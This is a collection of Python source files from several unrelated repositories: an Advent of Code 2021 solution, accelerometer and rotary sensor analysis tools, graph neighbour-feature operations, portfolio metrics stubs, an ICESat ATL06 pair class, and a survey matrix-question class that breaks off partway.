#### File: AdventOfCode2021/day7/main.py ```python import os import time from typing import Counter def convert_to_int(string_list): for i in range(len(string_list)): string_list[i] = int(string_list[i]) return string_list def read_file(file_path, optional_divider=None): f = open(file_path, "r") if optional_divider is not None: return f.read().split(optional_divider) else: return f.read().split() def part_1(value_list): list.sort(value_list) frequency = [] j = 0 while j < 1912: frequency.append(0) j += 1 for i in range(len(value_list)): frequency[value_list[i]] += 1 min_value = 1000000 for i in range(len(frequency)): current_value = 0 for j in range(len(frequency)): if j != i: current_value += frequency[j] * abs(j - i) if current_value < min_value: min_value = current_value return min_value def part_2(value_list): list.sort(value_list) frequency = [] j = 0 while j < 1912: frequency.append(0) j += 1 for i in range(len(value_list)): frequency[value_list[i]] += 1 min_value = 1000000000000000000 for i in range(len(frequency)): current_value = 0 for j in range(len(frequency)): if j != i: distance = abs(j - i) counter = 1 while counter <= distance: current_value += frequency[j] * counter counter += 1 if current_value < min_value: min_value = current_value return min_value if __name__ == '__main__': dir_path = os.path.dirname(os.path.realpath(__file__)) input_read = read_file(dir_path + "/" + "input1.txt", ",") value_list = convert_to_int(input_read) start_time = time.time() print("part 1: ", part_1(value_list)) print("--- %s seconds ---" % (time.time() - start_time), "\n") start_time = time.time() print("part 2: ", part_2(value_list)) print("--- %s seconds ---" % (time.time() - start_time), "\n") ```
{ "source": "aaanh/duplicated_accelcamp", "score": 3 }
#### File: src/deprecated/Pseudo.py ```python import matplotlib.pyplot as plt from modules.Tools import * #create variable to grab sample rate '''Add user time selection functionality''' def LoadRaw_1( fullPathName): # unpack makes it column-major block =np.loadtxt( fullPathName,dtype=float, comments= ";", delimiter=',', usecols=(0,1,2,3), unpack=True, skiprows=1) #current file is q1 #skipping 10 rows is device specific a= block[0:] #a[0] is time ix=0 iy=1 iz=2 return a def LoadRaw_2( fullPathName): ''' gets rid of ; stop ... in csv file completed with a comment argument''' # unpack makes it column-major block =np.loadtxt( fullPathName,dtype=float, comments= ";", delimiter=',', usecols=(0,1,2,3), unpack=True, skiprows=10) #current file is TopRight_Feb18 #skipping 10 rows is device specific a= block[0:] #a[0] is time ix=0 iy=1 iz=2 return a def LoadRaw_3( fullPathName): ''' gets rid of ; stop ... in csv file completed with a comment argument''' # unpack makes it column-major block =np.loadtxt( fullPathName,dtype=float, comments= ";", delimiter=',', usecols=(0,1,2,3), unpack=True, skiprows=9) #current file is TopRight_Feb18 #skipping 10 rows is device specific a= block[0:] #a[0] is time ix=0 iy=1 iz=2 return a ''' try: for i in : if i == "Time": LoadRaw_1 ''' '''after this the script should run perfectly, the LoadRaw function is the determining factor''' # -- open file -- myOpts = {} myOpts['initialfile'] = 'TopRight_Feb18.csv' '''Test file was TopRight_Feb18.csv''' fullPathName = dialogOpenFilename(myOpts) # for dev. purposes, skip dialog and use in-code filename #fName = "PythonTestData1.csv" #fullPathName = os.getcwd + "\\" + fName # b = LoadArray_GCEDCDblue(filename) # t= block[0] # # ax= block[1] # # ay= block[2] a = LoadRaw_3(fullPathName) times = a[0] print(a) '''Asks for outer radius''' try: Rdx = input("What was the Rdx in mm?") Rdy = input("What was the Rdy in mm?") Rdx_int = int(Rdx) Rdy_int = int(Rdy) print("Rdx is %s \nRdy is %s" %(Rdx, Rdy)) except ValueError: print("A number was not entered") Rdx = input("What was the Rdx?") Rdy = input("What was the Rdy?") '''Graphing ax vs t and ay vs t''' time = a[0] ax = a[1] ay = a[2] '''display graphs before user times''' avg_ax = np.average(ax) avg_ay = np.average(ay) print("The average acceleration in x is %s\nThe average acceleration in y is %s" %(avg_ax,avg_ay)) #plt.title('raw data: close window to show RMS analysis') plt.subplot(2,1,1) plt.plot(time,ax, label="Accel in x") plt.minorticks_on() plt.grid(b=True, which='both', color='0.65',linestyle='-') plt.xlabel("Time") plt.ylabel("Acceleration in x-direction") ax_mean = [np.mean(ax)]*len(time) ax_mean_line = plt.plot(time,ax_mean, label='Mean', linestyle='--') plt.legend(['Acceleration in x', 'Average in x']) plt.subplot(2,1,2) plt.subplots_adjust(hspace=0.3) plt.plot(time,ay, label='Accel in y') plt.minorticks_on() plt.grid(b=True, which='both', color='0.65',linestyle='-') plt.xlabel("Time") plt.ylabel("Acceleration in y-direction") ay_mean = [np.mean(ay)]*len(time) ay_mean_line = plt.plot(time,ay_mean, label='Mean', linestyle='--') plt.legend(['Acceleration in y', 'Average in y']) plt.ioff() plt.show() print("time") try: Start = input("Starting time") End = input("End time") Start_int = int(Start) End_int = int(End) print("Start is %s seconds\nEnd is %s seconds" %(Start, End)) except ValueError: print("A time was not entered") Start = input("Starting time") End = input("End time") '''user selected time''' n=0 avg_x = 0 avg_x_2 = 0 for i in range(len(time)): if( time[i]>Start_int and time[i]<End_int): avg_x += ax[i] n+=1 avg_x/=n print("avg and n ", avg_x, n) avg_x_2 = ax[(time>Start_int) & (time<End_int)].mean() print("method 1: " + str(avg_x)) print("method 2: " + str(avg_x_2)) ``` #### File: src/deprecated/xViewRawAccelData.py ```python import matplotlib.pyplot as plt from modules.Tools import * def zkXLabelTime(plt): plt.xlabel(r'$time \ t \ \left(s\right)$') def f(plt, string): plt.ylabel(r'$A_'+'z \ \left(m/s^2\right)$', fontweight='bold') x2 = r'$A_' + v + r'\ \left(m/s^2\right)$' #plt.ylabel(r'$A_x \ \left(m/s^2\right)$') plt.ylabel(x2) # -- open file -- myOpts = {} myOpts['title'] = 'Select CVS source file' myOpts['initialfile'] = 'PythonTestData1.csv' fullPathName = dialogOpenFilename(myOpts) a = LoadArray(fullPathName) az = a[2] # figsize is absolute size of individual plot figures #fig, ax = plt.subplots(num=None, figsize=(9, 4), dpi=80, facecolor='w', edgecolor='k') fig, ax = plt.subplots(num=None, dpi=80, facecolor='w', edgecolor='k') fig.canvas.set_window_title('3-axis raw accelerometer data') fig.suptitle('3-axis raw accelerometer data', fontsize=20) fig.set_size_inches(10,10) # absolute size of the frame # #ff5500ff plt.rc("font", size=16) #plt.rc("fontweight",'bold') plt.subplots_adjust(top = .85, bottom = .1 , hspace = .71) # top plt.subplot(3,1,1) zkXLabelTime(plt) zkYLabelAcceleration(plt,'x') #plt.xlabel(r'$time \ t \ \left(s\right)$') #f(plt,'d') s1 = "r'$A_" s2="x \ \left(m/s^2\right)$',fontweight='bold'" s3=s1+s2 x = r'$A_ \left(m/s^2\right)$' v='x' x2 = r'$A_' + v + r'\ \left(m/s^2\right)$' #plt.ylabel(r'$A_x \ \left(m/s^2\right)$') plt.ylabel(x2) plt.plot(a[0]) plt.subplot(3,1,2) zkXLabelTime(plt) plt.ylabel(r'$A_y \ \left(m/s^2\right)$',fontweight='bold') plt.plot(a[1]) plt.subplot(3,1,3) zkXLabelTime(plt) plt.plot(a[2]) plt.ylabel(r'$A_z \ \left(m/s^2\right)$',fontweight='bold') plt.show() c= diff(a) c=ediff ``` #### File: src/modules/Curvature.py ```python import numpy as np from modules.DataStructures import AccelData def GenADot(_AccelData:AccelData): """ Outputs an array of doubles that represents the first-order derivative of the acceleration data """ adot_list = np.array([]) dt = _AccelData.t[1]-_AccelData.t[0] for i in range(len(_AccelData.getSingleAxis(0))-1): # basically appends a new dy/dt to the list adot_list = np.array(list(adot_list)+[(_AccelData.getSingleAxis(1)[i+1]-_AccelData.getSingleAxis(1)[i])/dt]) return adot_list def Genyx2(_AccelData:AccelData): """does y*x^2 for the given data set""" olist = (np.square(_AccelData.getSingleAxis(0))*_AccelData.getSingleAxis(1))[:-1] return olist # double[] ``` #### File: src/modules/DataStructures.py ```python import numpy as np # this file to replace the current "DataStructures.py" ############# tools to catch type erros in ndarray structures ######### # type "vec3" is restrictively defined to be an ndarray of 3 doubles def isVec3( a : np.ndarray ) -> bool: if not isinstance(a,np.ndarray) : return False if len(np.shape(a)) != 1: return False if np.shape(a)[0] != 3: return False if a.dtype != np.double(999): return False return True def isArrayOfVec3( a : np.ndarray ) -> bool: if not isinstance(a, np.ndarray): return False if len(np.shape(a)) != 2: return False if not isVec3( a[0] ) : return False return True def assertIsArrayOfVec3( a : np.ndarray , context : str) -> None : assert isArrayOfVec3(a), context + ": elements of ndarray must be vec3, i.e. sub-arrays with shape (3,)" def isScalarArrayOfDoubles( a: np.ndarray) -> bool: if not isinstance(a, np.ndarray): return False if len(np.shape(a)) != 1: return False if a.dtype != np.double(999).dtype: return False return True # tentative argument prefix naming convention: ( PEP8 does not specify how to name variables & arguments ) # as_xxx : an array of scalars ( i.e. a 1-dim array ) # av_xxx : an array of vectors ( i.e. a generic 2-dim array ) # av3_xxx: an array of vec3's # v3_xxx: a vec3 ( i.e. a 1-dim array of length 3 ) class TimeSeries: # self.t is an array of doubles ; i.e. t[i] is the i-th t-value # todo: store self.delta_t, an array of doubles ( more efficient for core computations ) # todo: provide self.getTArray() ( used mostly by plot utilities ) def __init__(self, as_t): assert (isScalarArrayOfDoubles(as_t)) self.t = as_t def __len__(self) -> int: return len(self.t) def delta_t(self, i : int ): return self.t[i+1]-self.t[i] class AccelData (TimeSeries): # self.a is an array of vec3's ; i.e. a[i] is an array of length 3 holding the acceleration vector at time t[i] # ( this is the opposite of the current AccelData, in which a[i] is an array of length n holding # the values of the i-th component of the acceleration vector for all time steps. # i.e. old layout : a[axis][time] # new layout : a[time][axis] def __init__(self, as_t, av3_a, sModelType = "unspecified model type" ): TimeSeries.__init__(self,as_t) assertIsArrayOfVec3(av3_a, context = "Accel constructor") ff = len(av3_a) jj = len(as_t) assert len(av3_a) == len(as_t) , "accel raw data not same length as time values" self.a = av3_a self.model = sModelType def getSingleAxis(self, axisIndex): return self.a[:,axisIndex] def AddNoise(self, magnitude): # for i in range(len(self)): self.a += np.array([ np.random.normal(0, magnitude, len(self)), np.random.normal(0, magnitude, len(self)), np.random.normal(0, magnitude, len(self)) ]).transpose() class RotaryData (TimeSeries): def __init__(self, as_t, as_omega): TimeSeries.__init__(self,as_t) assert isScalarArrayOfDoubles(as_omega), "RotaryData constructor" assert( len(as_omega)==len(self)) self.omega = as_omega def AddNoise(self, magnitude): self.omega += np.random.normal(0, magnitude, len(self)) ################ test ################ def test_DataStructures() -> None: v3_good = np.ndarray(shape=(3,), dtype=np.double) v3_bad1 = np.ndarray(shape=(2,), dtype=np.double) v3_bad2 = np.ndarray(shape=(3,2), dtype=np.double) v3_bad3 = np.ndarray(shape=(10,3), dtype=np.double) v3_bad4 = np.ndarray(shape=(3,), dtype=np.int) assert(isVec3(v3_good)) assert(not isVec3(v3_bad1)) assert(not isVec3(v3_bad2)) assert(not isVec3(v3_bad3)) assert(not isVec3(v3_bad4)) av3_good = np.ndarray(shape=(10,3), dtype=np.double) av3_bad1 =np.ndarray(shape=(3,), dtype=np.double) av3_bad2 =np.ndarray(shape=(10,4), dtype=np.double) av3_bad3 = list([[1,2,3],[4,5,6]]) assert(isArrayOfVec3(av3_good)) assert(not isArrayOfVec3(av3_bad1)) assert(not isArrayOfVec3(av3_bad2)) assert(not isArrayOfVec3(av3_bad3)) t = np.ndarray(shape=(10,), dtype=np.double) ad = AccelData(t,av3_good) t_bad = np.ndarray(shape=(9,), dtype=np.double) av3_good[0] = [1,2,3] av3_good[1] = [4,5,6] av3_good[2] = [7,8,9] xValues = ad.getSingleAxis(axisIndex=0) print('x values ', xValues[:3]) xValues = ad.getSingleAxis(axisIndex=2) print('z values ', xValues[:3]) if __name__ == "__main__" : test_DataStructures() ``` #### File: src/modules/LoadOmega.py ```python import numpy as np from modules.Tools import dialogOpenFilename from modules.DataStructures import RotaryData def Load_Omega(filepath=None): if(filepath == None): filepath = dialogOpenFilename() block = np.loadtxt(filepath, dtype=float, delimiter=',', usecols=(0,1), unpack=True, skiprows=2) return RotaryData(block[0], block[1]) ``` #### File: src/modules/Load.py ```python from modules.LoadAccel import * from modules.LoadOmega import * import os from tkinter import * defaultdir = "../data" def LoadDataSet(dirpath=None): if(dirpath==None): root = Tk() root.withdraw() dirpath = filedialog.askdirectory(parent=root,initialdir=defaultdir,title='Please select a dataset') files = os.listdir(dirpath) print("-------Found "+str(len(files))+ " files-------") for i in files: print("Found: "+i) print("----------------------------") i = 1 runs_files = [] while(True): run = list(filter(lambda x: x == "run"+str(i), files)) if(run != []): runs_files += run else: break i+=1 print("Found "+str(len(runs_files))+" runs") runs_data = [] for run in runs_files: print("\n\n-----------------"+run+"-----------------") runs_data.append(LoadRun(dirpath+"/"+run+"/")) return runs_data # load a single AccelData object and RotaryData object # simpler front-end for LoadRun() def LoadSingleRun( dirpath=None): run = LoadRun(dirpath) return { "accel": run["accel"][0], "omega": run["omega"][0]} # deprecated: def LoadRun(dirpath=None): return LoadMultiRun(dirpath) # Load multiple runs as a list of AccelData objects and list of RotaryData objects def LoadMultiRun(dirpath=None): if(dirpath==None): root = Tk() root.withdraw() dirpath = filedialog.askdirectory(parent=root,initialdir=defaultdir,title='Please select a run') found_files = os.listdir(dirpath) print("-------Found "+str(len(found_files))+ " files-------") for i in found_files: print("Found: "+i) print("The Following Files Will be Ignored:") not_file = list(filter(lambda x: ((x.split(".")[type_index]!="accel" and x.split(".")[type_index]!="omega") or x.split(".")[-1].lower()!="csv" or len(x.split(".")) != 4 ), found_files)) for i in not_file: print("- "+i+("(Wrong File Structure)" if len(i.split(".")) != 4 else "(Wrong File Format)" if i.split(".")[-1].lower()!="csv" else "(Unsupported Type)" if i.split(".")[type_index]!="accel" and i.split(".")[type_index]!="omega" else "" )) if(not_file == []): print("--None--") print("----------------------------") files = list(filter(lambda x: not_file.count(x) == 0, found_files)) accels_files = list(filter(lambda x: x.split(".")[type_index]=="accel", files)) accels_data = [] for file in accels_files: print("processing "+file+"...") data = LoadAccelFile(dirpath+"/"+file) if(data != "Model is not currently supported"): accels_data.append(data) else: print("Failed to Load: "+file+" (Model not supported)") omega_files = list(filter(lambda x: x.split(".")[type_index]=="omega", files)) omega_data = [] for file in omega_files: print("processing "+file+"...") omega_data.append(Load_Omega(filepath=str(dirpath+"/"+file))) if accels_data == [] and omega_data == []: raise FileNotFoundError('No files were found.') return {"accel": accels_data, "omega": omega_data} ``` #### File: src/modules/Simulate.py ```python from modules import Tools from modules.DataStructures import * from modules.Cluster import * import math # region Generic AlphaSim Functions def AlphaSim_ConstOmegaPositive(): return def AlphaSim_ConstOmegaChangesSign(): return def AlphaSim_Piecewise1(t): if t < 0: return 1 elif 0 <= t < 0.5: return 0.5 elif 0.5 <= t < 1: return 0.25 elif 1 <= t: return 0.5 def AlphaSim_Piecewise2(t): if t < -2: return t * 1.5 elif -2 <= t < 5: return math.sin(t) elif 5 <= t < 7: return 0.5 elif 7 <= t: return math.cos(t) def AlphaSim_Sinusoidal1(t): A = 2 omega = 1 phaseConstant = 0 return A * math.sin(omega * t + phaseConstant) def AlphaSim_GenerateAlphaArray(alphaFunc, N, deltaT): typeofA = 'f' try: alphaFunc(0) typeofA = 'f' except: try: alphaFunc = float(alphaFunc) typeofA = 'n' except: raise ValueError('A must be a function or a number') array = [] for i in range(N): array.append(alphaFunc(i * deltaT) if typeofA == 'f' else alphaFunc) return array # endregion # alphaFn is always a function # constant-value alpha is accomplished by feeding a const-value function # return a RotaryData object def RotaryData_CreateFromAlphaFunction( alphaFn, N, deltaT, omegaInitial=0, ): try: float(alphaFn(0)) # if A can be converted to a float, this won't raise an Error except: raise ValueError('alphaFn must be a function that returns a single number') omega = np.array([np.double(omegaInitial)] * N) time = np.array([np.double(0.0)] * N) for i in range(1, N): omega[i] = omega[i - 1] + alphaFn(i * deltaT) * deltaT # small check to verify the value of typeofA time[i] = i * deltaT return RotaryData(time, omega) # returns nothing: rotData itself is modified def RotaryData_AddNoise( rotData: RotaryData, magnitude: float ): return RotaryData(rotData.t, rotData.omega + np.random.normal(0, magnitude, len(rotData))) # generate simulated AccelData for a sensor at radial distance of "radius" # starting from a rotary-sensor signal "omegaData" # returns a AccelData object def AccelData_CreateFromRotary( rotData : RotaryData, radius : float): deltaT = rotData.t[1] - rotData.t[0] a = [] for i in range(len(rotData) - 1): a.append([ rotData.omega[i] ** 2 * radius, radius * (rotData.omega[i + 1] - rotData.omega[i]) / deltaT, 0 ]) a = np.array(a) return AccelData(rotData.t[:-1], a, "synthetic data") def AccelData_CreateFromRotary2( rotData : RotaryData, radius : float): deltaT = rotData.t[1] - rotData.t[0] a = [] for i in range(len(rotData) - 1): arfoo = rotData.omega[i] ** 2 * radius arnextfoo = rotData.omega[i+1] ** 2 * radius atfoo = radius * (rotData.omega[i + 1] - rotData.omega[i]) / deltaT cluster = Cluster_CreateFromCell(Cell(arfoo,atfoo,deltaT), radius) # print(cluster.ar_next - arnextfoo) # print(cluster.costDeltaOmega(4)) a.append([ arfoo, atfoo, 0 ]) aout = np.array(a) for i in range(len(a)-1): cluster2 = Cluster_CreateFromAccelData(AccelData(rotData.t[:-1], aout, "synthetic data"), i) print(cluster2.ar_next-a[i+1][0]) print(cluster2.costDeltaOmega(4)) return AccelData(rotData.t[:-1], aout, "synthetic data") # rotate all vectors counterclockwise by an amount "angle" def AccelData_Rotate( ad : AccelData, angle : float ): a = ad.a for i in range(len(a)): a[i] = Tools.rotate_vec3(a[i], angle) ad.a = a return ad # add gaussian noise to the components on all 3 axes def AccelDat_AddNoise( ad : AccelData, magnitude : float ): ad.a += np.array([ np.random.normal(0, magnitude, len(ad.a)), np.random.normal(0, magnitude, len(ad.a)), np.random.normal(0, magnitude, len(ad.a)) ]).transpose() return ad # ======================== Example for radius and alpha functions ======================== def example_radius(x): # the function must have only one input which is a number out = 4*x # stuff happens here... return out # the function must return a single numerical value ``` #### File: src/tests/devTest_Optimizer_Normal.py ```python import matplotlib.pyplot as plt import numpy as np from modules.Optimizers import * from modules.Simulate import * def alphaFn(x): return 1 def grad_approx(fn, x, qual, *params): return ( fn(x + qual, *params) - fn(x - qual, *params) ) / (2 * qual) acc_data = AccelData_CreateFromRotary(RotaryData_CreateFromAlphaFunction(alphaFn, 52, 0.1), 4) def cost_SimpleRadial(r, ar, ar_next, at, dt): ardot = (ar_next - ar) / dt term2 = np.square(at) * dt / r term3 = 2 * at * np.sqrt(ar / r) return np.square(ardot - term2 - term3) fn = cost_SimpleRadial index = 20 parameters = { 'ar': acc_data.a[index][0], 'ar_next': acc_data.a[index + 1][0], 'at': acc_data.a[index][1], 'dt': acc_data.delta_t(index) } Adam = AdamOptimizer_1D(cost_SimpleRadial) Adam.config(['x0', 2]) Adam.FillParameters(*list(parameters.values())) x = Adam.Optimize(alpha=0.01, beta1=0.9, beta2=0.999, return_array=True) it = 50 out = [] for i in range(len(x)): if i % it == 0: out.append(x[i]) if out[-1] != x[-1]: out.append(x[-1]) out = np.array(out) print(out[-1], out[0]) time = np.arange(out[-1] - 3, out[0] + 3, 0.1) if out[-1] < out[0] else np.arange(out[0] - 3, out[-1] + 3, 0.1) plt.plot(time, fn(time, *list(parameters.values())), color='blue') plt.plot(out, fn(out, *list(parameters.values())), 'o', color='green') plt.plot(out[0], fn(out[0], *list(parameters.values())), 'o', color='black') plt.annotate('Start', (out[0], fn(out[0], *list(parameters.values())))) origins = out, fn(out, *list(parameters.values())) gradients = -grad_approx(fn, out, 0.00001, *list(parameters.values()))*0.00001 plt.quiver(*origins, gradients, 0, color='purple', width=0.005) i = 0.80 k = 0.65 for item in parameters: # This figtext value-bound string print method is exactly how print in python2.7 works plt.figtext(k, i, item + ": " + str("%.1f" % parameters[item]) + ";", color='red', fontsize="large") i -= 0.05 plt.ylim(-1, 100) plt.ylabel('cost') plt.xlabel('radius') plt.show() ``` #### File: src/tests/Test_Curvature.py ```python from modules.Load import * from modules.Curvature import * from modules.Simulate import * import matplotlib.pyplot as plt _range = [13, 18] if __name__ == "__main__": use_range = True if input("use time range? (y/n): ") == "y" else False use_synthetic_data = True if input("use synthetic data? (y/n): ") == "y" else False if use_range: _range = [float(input("Beginning: ")), float(input("End: "))] if use_synthetic_data: if True if input("use omega file? (y/n): ") == "y" else False: o = LoadRun()["omega"][0] else: o = RotaryData_CreateFromAlphaFunction( N=int(input("Number of iterations: ")), deltaT=np.float32(input("Delta t: ")), alphaFn=np.float32(input("alpha: ")), omegaInitial=np.float32(input("omega at t=0: ")) ) acceldat = AccelData_CreateFromRotary(o, np.float32(input("Radius: "))) else: acceldat = LoadRun()["accel"][0] else: use_range = False use_synthetic_data = False acceldat = LoadAccelFile("../../data/2019 06 12/0 degrees/run1/run1.accel.x2.CSV") if use_range: mask = np.logical_not((_range[0] <= acceldat.t[:-1]) ^ (_range[1] >= acceldat.t[:-1])) else: mask = np.array([True]*len(acceldat.t[:(-1 if not use_synthetic_data else -2)])) adot = GenADot(acceldat)[mask] yx2 = Genyx2(acceldat)[mask] if __name__ != "__main__": def close_event(): plt.close() #timer calls this function after 3 seconds and closes the window fig = plt.figure() timer = fig.canvas.new_timer(interval = 1000) #creating a timer object and setting an interval of 3000 milliseconds timer.add_callback(close_event) timer.start() plt.scatter(yx2, np.square(adot)) plt.show() ```
{ "source": "Aaanonymousss/G4P", "score": 3 }
#### File: G4P/dgp_graph/my_op.py ```python import numpy as np import tensorflow as tf def neighbour_feats(adj, x): # in: adj(n, n), x(n, feat) # out: selected(n, n*feat) a_ = np.expand_dims(adj, axis=-1) # note the location of expanding selected = a_*x return selected.reshape(x.shape[0], -1) def tf_neighbour_feats(adj, x): # in: adj(n, n), x(n, feat) # out: selected(n, n*feat) a_ = tf.expand_dims(adj, axis=-1) # note the location of expanding selected = a_*x return tf.reshape(selected, (x.shape[0], -1)) def neighbour_feats3d(adj, batch_x): # adj(n, n), batch_x(batch, n, feat) # out: selected(batch, n, n*feat) a_ = np.expand_dims(adj, axis=-1) x_ = np.expand_dims(batch_x, axis=1) # note the location of expanding selected = a_*x_ return selected.reshape(batch_x.shape[0], batch_x.shape[1], -1) def tf_neighbour_feats3d(adj, batch_x): # adj(n, n), batch_x(batch, n, feat) # out: selected(batch, n, n*feat) a_ = tf.expand_dims(adj, axis=-1) x_ = tf.expand_dims(batch_x, axis=1) # note the location of expanding selected = a_ * x_ x_shape = tf.shape(batch_x) return tf.reshape(selected, (x_shape[0], x_shape[1], -1)) def test_neighbour_feats(): a = np.random.randint(0, 2, size=(3, 3)) a += a.T a[a>1] = 1 bx = np.random.randint(1, 10, size=(2, 3, 2)) x = bx[0] assert np.array_equal(neighbour_feats(a,x), np.stack([a*x[:,i] for i in range(2)], axis=-1).reshape(3, -1)) assert np.array_equal(neighbour_feats3d(a,bx), np.stack([neighbour_feats(a, bx[i]) for i in range(2)], axis=0).reshape(2, 3, -1)) def neighbour_feats_sum(adj, X): # compatiable with batched X return np.matmul(adj, X) def tf_neighbour_feats_sum(adj, X): # compatiable with batched X return adj@X func_dict = dict( nbf_sum = neighbour_feats_sum, nbf_concat = neighbour_feats, nbf_concat3d = neighbour_feats3d, tf_nbf_sum = tf_neighbour_feats_sum, tf_nbf_concat = tf_neighbour_feats, tf_nbf_concat3d = tf_neighbour_feats3d ) def get_nbf_op(name, is_tf=False): func_name = 'tf_nbf_' + name if is_tf else 'nbf_'+name func = func_dict.get(func_name, None) if func is None: raise NotImplementedError('required func {}(is_tf={}) is not implemented'.format(name, is_tf)) return func ``` #### File: Aaanonymousss/G4P/metrics.py ```python import matplotlib.pyplot as plt import pandas as pd import numpy as np from numpy import exp, abs, log from scipy.special import gamma, factorial from utils import * def cumulative_return(rt_v): return exp(np.sum(rt_v)) def plot_cumulative_return_history(concat_results, strategy_lst, figsize=(10,5)): plt.figure(figsize=figsize) plt.title('cumulative return') for strategy in strategy_lst: strategy_name = strategy.split('(')[0] rt_v, x_vec = concat_results[strategy_name] exp_rt = rt_v.copy() for i in range(1, len(rt_v)): exp_rt[i] += exp_rt[i-1] exp_rt = exp(exp_rt) plt.plot(exp_rt, label=strategy_name) plt.legend() plt.show() def daily_return(rt_v): return exp(np.mean(rt_v)) def cumulative_return_fee(rt_v, x_vec, c): # TODO return 0 def plot_cumulative_return_history(concat_results, strategy_lst, c, figsize=(10,5)): # TODO pass def daily_return_fee(rt_v, x_vec, c): # TODO return 0 def max_redraw(rt_v): # TODO: to standard res = max([rt_v[i] - min(rt_v[i+1:]) for i in range(len(rt_v)-1)]) return res def sharpe_ratio(rt_v, rf): # TODO return 0 def volatility(rt_v): # TODO return 0 def turnover(rt_v): # TODO return 0 ```
{ "source": "aaaqhbd/psa", "score": 3 }
#### File: psa/network/vgg16_subcls.py ```python import torch import torch.nn as nn import torch.nn.functional as F import network.vgg16d class Net(network.vgg16d.Net): def __init__(self): super(Net, self).__init__() self.dim=[1024] self.drop7 = nn.Dropout2d(p=0.5) self.fc8 = nn.Conv2d(1024, 20, 1, bias=False) torch.nn.init.xavier_uniform_(self.fc8.weight) self.fc8sub = nn.Conv2d(1024, 20*10, 1, bias=False) torch.nn.init.xavier_uniform_(self.fc8sub.weight) self.not_training = [self.conv1_1, self.conv1_2, self.conv2_1, self.conv2_2] self.from_scratch_layers = [self.fc8,self.fc8sub] def forward(self, x): x = super().forward(x) x = self.drop7(x) xf=F.avg_pool2d(x, kernel_size=(x.size(2), x.size(3)), padding=0) xp = self.fc8(x) xsub=self.fc8sub(x) xsub = F.avg_pool2d(xsub, kernel_size=(x.size(2), x.size(3)), padding=0) xp = F.avg_pool2d(xp, kernel_size=(x.size(2), x.size(3)), padding=0) xsub=xsub.view(-1,20*10) xp = xp.view(-1, 20) return xf,xp,xsub def forward_cam(self, x): x = super().forward(x) x = self.fc8(x) x = F.relu(x) x = torch.sqrt(x) return x def fix_bn(self): self.bn8.eval() self.bn8.weight.requires_grad = False self.bn8.bias.requires_grad = False def get_parameter_groups(self): groups = ([], [], [], []) for m in self.modules(): if (isinstance(m, nn.Conv2d) or isinstance(m, nn.BatchNorm2d)): if m.weight is not None and m.weight.requires_grad: if m in self.from_scratch_layers: groups[2].append(m.weight) else: groups[0].append(m.weight) if m.bias is not None and m.bias.requires_grad: if m in self.from_scratch_layers: groups[3].append(m.bias) else: groups[1].append(m.bias) return groups ```
{ "source": "AAArdu/adversarialML", "score": 3 }
#### File: _func/Attack/BIGS.py ```python from advML.function import advML_deep_package import torch.nn as nn import torch def BIGS(model,input,lable,epsilon,times): if(advML_deep_package == 'pytorch'): from torch.nn import Module from torch import Tensor assert isinstance(model,Module),'Model should be a child-class of Module' assert isinstance(input,Tensor),'Input should be a Tensor' assert isinstance(lable,Tensor),'Lable should be a Tensor' return BIGS_pytorch(model,input,lable,epsilon,times) else: assert 0>1,"The deep package is unsupported!" def BIGS_pytorch(model,input,lable,epsilon,times): perturbed_input = input for i in range(times): perturbed_input.requires_grad = True predict = model(perturbed_input) criterion = nn.CrossEntropyLoss() loss = criterion(predict,lable) model.zero_grad() loss.backward() with torch.no_grad(): perturbed = 0.01 * (perturbed_input.grad.data.sign()) perturbed_input = Clip(perturbed_input,perturbed_input+perturbed,epsilon) return perturbed_input def Clip(original,input,epsilon): input = torch.where(input>original-epsilon,input,original) input = torch.where(input<original+epsilon,input,original) return torch.clamp(input,0,1) ```
{ "source": "aaarendt/PointDatabase", "score": 3 }
#### File: aaarendt/PointDatabase/ATL06_pair.py ```python import numpy as np class ATL06_pair: def __init__(self, D6=None, pair_data=None): if D6 is not None: #initializes based on input D6, assumed to contain one pair # 2a. Set pair_data x and y self.x=np.mean(D6.x_atc) # mean of the pair, nan if not both defined self.y=np.mean(D6.y_atc) self.dh_dx=D6.dh_fit_dx self.dh_dx.shape=[1,2] self.dh_dy=np.mean(D6.dh_fit_dy) self.delta_time=np.mean(D6.delta_time) self.segment_id=np.mean(D6.segment_id) self.cycle=np.mean(D6.cycle_number) self.h=D6.h_li self.h.shape=[1,2] self.valid=np.zeros(1, dtype='bool') elif pair_data is not None: # initializes based on a list of pairs, to produce a structure with numpy arrays for fields for field in ('x','y','dh_dx','dh_dy','delta_time','segment_id','cycle','h','valid'): setattr(self, field, np.c_[[getattr(this_pair,field).ravel() for this_pair in pair_data]]) else: #initializes an empty structure for field in ('x','y','dh_dx','dh_dy','delta_time','segment_id','cycle','h','valid'): setattr(self, field, np.NaN) def __getitem__(self, key): temp06=ATL06_pair() for field in ('x','y','dh_dx','dh_dy','delta_time','segment_id','cycle','h','valid'): temp_field=getattr(self, field) if len(temp_field.shape)>1 and temp_field.shape[1] > 1: setattr(temp06, temp_field[key,:]) else: setattr(temp06, temp_field[key]) return temp06 ```
{ "source": "aaarendt/surveyhelper", "score": 3 }
#### File: surveyhelper/surveyhelper/question.py ```python from itertools import compress import pandas as pd import numpy as np from abc import ABCMeta, abstractmethod from surveyhelper.scale import QuestionScale, LikertScale, NominalScale, OrdinalScale from scipy.stats import ttest_ind, f_oneway, chisquare class MatrixQuestion: __metaclass__ = ABCMeta def __init__(self, text, label, questions): self.text = text self.questions = questions self.label = label self.assert_questions_same_type() self.assert_choices_same() self.assign_children_to_matrix() def exclude_choices_from_analysis(self, choices): for q in self.questions: q.exclude_choices_from_analysis(choices) def reverse_choices(self): for q in self.questions: q.reverse_choices() def change_scale(self, newtype, values = None, midpoint = None): for q in self.questions: q.change_scale(newtype, values, midpoint) def change_midpoint(self, midpoint): for q in self.questions: q.scale.midpoint = midpoint def get_scale(self): if len(self.questions) > 0: return(self.questions[0].scale) else: None def assert_questions_same_type(self): if all(type(x) == type(self.questions[0]) for x in self.questions): return(True) else: raise(Exception("Questions in a matrix must all have the same type")) def assert_choices_same(self): if all([x.scale == self.questions[0].scale for x in self.questions]): return(True) else: raise(Exception("Questions in a matrix must all have the same choices")) def assign_children_to_matrix(self): for q in self.questions: q.matrix = self return def get_variable_names(self): names = [] for q in self.questions: names += q.get_variable_names() return(names) def get_children_text(self): return([q.text for q in self.questions]) def pretty_print(self, show_choices=True): print("{} ({})".format(self.text, self.label)) if show_choices: self.questions[0].pretty_print_choices() for q in self.questions: print(q.text) @abstractmethod def get_choices(self): pass @abstractmethod def frequency_table(self): pass 